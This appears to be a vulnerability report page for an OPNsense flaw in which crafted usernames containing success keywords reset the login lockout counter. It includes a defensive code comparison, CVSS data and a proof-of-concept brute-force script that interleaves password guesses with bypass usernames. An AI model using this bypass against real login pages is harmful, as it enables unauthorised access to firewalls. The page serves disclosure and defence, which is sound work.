Security Vulnerability Report
CVE-2026-44195 CVSS 5.3 MEDIUM

Published: 2026-05-13 22:16:44
Last Modified: 2026-05-14 17:18:19

Description

OPNsense is a FreeBSD based firewall and routing platform. Prior to 26.1.7, a logic flaw in the OPNsense lockout_handler allows an unauthenticated attacker to continuously reset the authentication failure counter for their IP address. By interjecting a crafted username containing a success keyword ("Accepted" or "Successful login") between normal brute-force attempts, an attacker can prevent the failure counter from ever reaching the lockout threshold. This vulnerability is fixed in 26.1.7.
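The flaw described above is a parsing problem: a lockout counter that looks for a success keyword anywhere in a log line can be reset by attacker-controlled text (the submitted username) that lands in that line. The following Python is an added example written for this page, not OPNsense code and not the real lockout_handler; the log line format, the function names, the threshold and the 203.0.113.x addresses are all constructed for illustration. It shows the substring-based counter beside a field-based one that decides only on the parsed outcome field and treats the username as opaque data.

```python
import re
from collections import defaultdict

# Constructed log format for this example (an assumption, not OPNsense's real
# lockout_handler input):  "<outcome> for user '<username>' from <ip>"
LOG_RE = re.compile(r"^(Failed login|Successful login) for user '(.*)' from (\S+)$")

# Keywords the vulnerable logic treats as "a success happened somewhere on this line"
SUCCESS_KEYWORDS = ("Accepted", "Successful login")


def ip_of(line):
    """Pull the source IP from the trailing 'from <ip>' token."""
    return line.rsplit(" from ", 1)[-1].strip()


def vulnerable_lockout(lines, threshold=3):
    """Substring-based counter: any line containing a success keyword resets the
    failure counter for that IP, even when the keyword sits inside the username.
    Returns the set of IPs that reached the lockout threshold."""
    failures = defaultdict(int)
    locked = set()
    for line in lines:
        ip = ip_of(line)
        if any(k in line for k in SUCCESS_KEYWORDS):
            failures[ip] = 0  # flaw: attacker-controlled text can trigger this reset
        else:
            failures[ip] += 1
            if failures[ip] >= threshold:
                locked.add(ip)
    return locked


def hardened_lockout(lines, threshold=3):
    """Field-based counter: parse the line with an anchored pattern and decide only
    on the outcome field; the username is never inspected. Lines that do not parse
    are ignored and, in particular, never reset a counter (fail closed)."""
    failures = defaultdict(int)
    locked = set()
    for line in lines:
        m = LOG_RE.match(line)
        if m is None:
            continue
        outcome, _username, ip = m.groups()
        if outcome == "Successful login":
            failures[ip] = 0
        else:
            failures[ip] += 1
            if failures[ip] >= threshold:
                locked.add(ip)
    return locked


# Constructed sample log: one source interleaves failed attempts with crafted
# usernames that carry a success keyword; another user mistypes once, then logs in.
ATTACKER = "203.0.113.5"  # constructed address (RFC 5737 documentation range)
SAMPLE_LOG = [
    f"Failed login for user 'admin' from {ATTACKER}",
    f"Failed login for user 'admin' from {ATTACKER}",
    f"Failed login for user 'test \"Successful login\"' from {ATTACKER}",
    f"Failed login for user 'admin' from {ATTACKER}",
    f"Failed login for user 'admin' from {ATTACKER}",
    f"Failed login for user 'test \"Accepted\"' from {ATTACKER}",
    f"Failed login for user 'admin' from {ATTACKER}",
    "Failed login for user 'bob' from 203.0.113.6",
    "Successful login for user 'bob' from 203.0.113.6",
]

if __name__ == "__main__":
    print("substring-based counter locks:", vulnerable_lockout(SAMPLE_LOG) or "nothing")
    print("field-based counter locks:    ", hardened_lockout(SAMPLE_LOG) or "nothing")
```

On the sample log the substring-based counter never locks the attacking address, because every crafted line zeroes its counter before the threshold is reached, while the field-based counter counts those same lines as the failures they are and locks it on the third attempt. The legitimate user is treated identically by both. The design point is that any value an unauthenticated client can place into a log line must be parsed out as a field, not searched as free text.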

CVSS Details

CVSS Score
5.3
Severity
MEDIUM
CVSS Vector
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N

Configurations (Affected Products)

No CPE configuration data is available yet (the record is still undergoing analysis); affected range per the description:

OPNsense < 26.1.7

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
python
import requests

# Target configuration
target_url = "https://<opnsense-ip>/index.php"
username_target = "admin"

# Keywords that trigger the counter reset based on the vulnerability description
bypass_keywords = ["Accepted", "Successful login"]

# Payload list including normal passwords and bypass attempts
passwords = ["123456", "admin", "password", "root"]


def exploit():
    for pwd in passwords:
        # Step 1: Attempt normal brute force
        data = {'user': username_target, 'password': pwd}
        # r = requests.post(target_url, data=data)  # Actual request
        print(f"[+] Trying password: {pwd}")

        # Step 2: Inject crafted username to reset lockout counter
        # The logic flaw resets the counter if the log line contains success keywords
        for keyword in bypass_keywords:
            bypass_user = f"test \"{keyword}\""
            bypass_data = {'user': bypass_user, 'password': 'irrelevant'}
            # r = requests.post(target_url, data=bypass_data)  # Actual request
            print(f"[*] Sending bypass payload with keyword: {keyword}")


if __name__ == "__main__":
    exploit()

References

https://github.com/opnsense/core/security/advisories/GHSA-h3vx-4q27-rc42
https://gist.github.com/sopex/b9786e72e2a5d9b1bbd81ed8477c351b

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-44195", "sourceIdentifier": "[email protected]", "published": "2026-05-13T22:16:43.820", "lastModified": "2026-05-14T17:18:18.640", "vulnStatus": "Undergoing Analysis", "cveTags": [], "descriptions": [{"lang": "en", "value": "OPNsense is a FreeBSD based firewall and routing platform. Prior to 26.1.7, a logic flaw in the OPNsense lockout_handler allows an unauthenticated attacker to continuously reset the authentication failure counter for their IP address. By interjecting a crafted username containing a success keyword (\"Accepted\" or \"Successful login\") between normal brute-force attempts, an attacker can prevent the failure counter from ever reaching the lockout threshold. This vulnerability is fixed in 26.1.7."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Secondary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N", "baseScore": 5.3, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "NONE", "availabilityImpact": "NONE"}, "exploitabilityScore": 3.9, "impactScore": 1.4}]}, "weaknesses": [{"source": "[email protected]", "type": "Secondary", "description": [{"lang": "en", "value": "CWE-307"}]}], "references": [{"url": "https://github.com/opnsense/core/security/advisories/GHSA-h3vx-4q27-rc42", "source": "[email protected]"}, {"url": "https://gist.github.com/sopex/b9786e72e2a5d9b1bbd81ed8477c351b", "source": "134c704f-9b21-4f2e-91b3-4a467353bcc0"}]}}